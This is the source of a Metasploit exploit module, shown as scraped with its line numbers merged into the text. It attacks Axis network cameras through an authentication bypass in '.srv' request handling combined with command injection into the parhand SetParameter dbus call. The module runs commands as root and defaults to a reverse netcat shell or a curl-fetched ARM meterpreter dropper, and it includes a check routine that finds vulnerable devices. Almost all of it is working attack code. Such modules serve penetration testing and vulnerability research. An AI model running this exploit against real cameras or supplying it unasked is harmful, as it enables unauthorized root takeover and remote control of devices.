Path: blob/master/modules/exploits/linux/http/axis_srv_parhand_rce.rb
19758 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = ExcellentRanking89include Msf::Exploit::Remote::HttpClient10include Msf::Exploit::CmdStager1112def initialize(info = {})13super(14update_info(15info,16'Name' => 'Axis Network Camera .srv-to-parhand RCE',17'Description' => %q{18This module exploits an auth bypass in .srv functionality and a19command injection in parhand to execute code as the root user.20},21'Author' => [22'Or Peles', # Vulnerability discovery (VDOO)23'wvu', # Metasploit module24'sinn3r', # Metasploit module25'Brent Cook', # Metasploit module26'Jacob Robles', # Metasploit module27'Matthew Kienow', # Metasploit module28'Shelby Pace', # Metasploit module29'Chris Lee', # Metasploit module30'Cale Black' # Metasploit module31],32'References' => [33['CVE', '2018-10660'],34['CVE', '2018-10661'],35['CVE', '2018-10662'],36['URL', 'https://blog.vdoo.com/2018/06/18/vdoo-discovers-significant-vulnerabilities-in-axis-cameras/'],37['URL', 'https://www.axis.com/files/faq/Advisory_ACV-128401.pdf']38],39'DisclosureDate' => '2018-06-18',40'License' => MSF_LICENSE,41'Platform' => ['unix', 'linux'],42'Arch' => [ARCH_CMD, ARCH_ARMLE],43'Privileged' => true,44'Targets' => [45[46'Unix In-Memory',47'Platform' => 'unix',48'Arch' => ARCH_CMD,49'Type' => :unix_memory,50'Payload' => {51'BadChars' => ' ',52'Encoder' => 'cmd/ifs',53'Compat' => {54'PayloadType' => 'cmd',55'RequiredCmd' => 'netcat-e'56}57},58'DefaultOptions' => {59'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'60}61],62[63'Linux Dropper',64'Platform' => 'linux',65'Arch' => ARCH_ARMLE,66'Type' => :linux_dropper,67'DefaultOptions' => {68'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'69}70]71],72'DefaultTarget' => 1,73'DefaultOptions' => { 'WfsDelay' => 10 },74'Notes' => {75'Reliability' => UNKNOWN_RELIABILITY,76'Stability' => UNKNOWN_STABILITY,77'SideEffects' => UNKNOWN_SIDE_EFFECTS78}79)80)81end8283def check84res = send_request_cgi(85'method' => 'GET',86'uri' => "/index.html/#{rand_srv}"87)8889if res && res.code == 20490return CheckCode::Appears91end9293CheckCode::Safe94end9596def exploit97case target['Type']98when :unix_memory99execute_command(payload.encoded)100when :linux_dropper101execute_cmdstager(flavor: :curl, nospace: true)102end103end104105def execute_command(cmd, opts = {})106send_request_cgi(107'method' => 'POST',108'uri' => "/index.html/#{rand_srv}",109'vars_post' => {110'action' => 'dbus',111'args' => dbus_send(112method: :set_param,113param: "string:root.Time.DST.Enabled string:;(#{cmd})&"114)115}116)117118send_request_cgi(119'method' => 'POST',120'uri' => "/index.html/#{rand_srv}",121'vars_post' => {122'action' => 'dbus',123'args' => dbus_send(method: :synch_params)124}125)126end127128def dbus_send(method:, param: nil)129args = '--system --dest=com.axis.PolicyKitParhand ' \130'--type=method_call /com/axis/PolicyKitParhand '131132args <<133case method134when :set_param135"com.axis.PolicyKitParhand.SetParameter #{param}"136when :synch_params137'com.axis.PolicyKitParhand.SynchParameters'138end139140args141end142143def rand_srv144"#{Rex::Text.rand_text_alphanumeric(8..42)}.srv"145end146147end148149150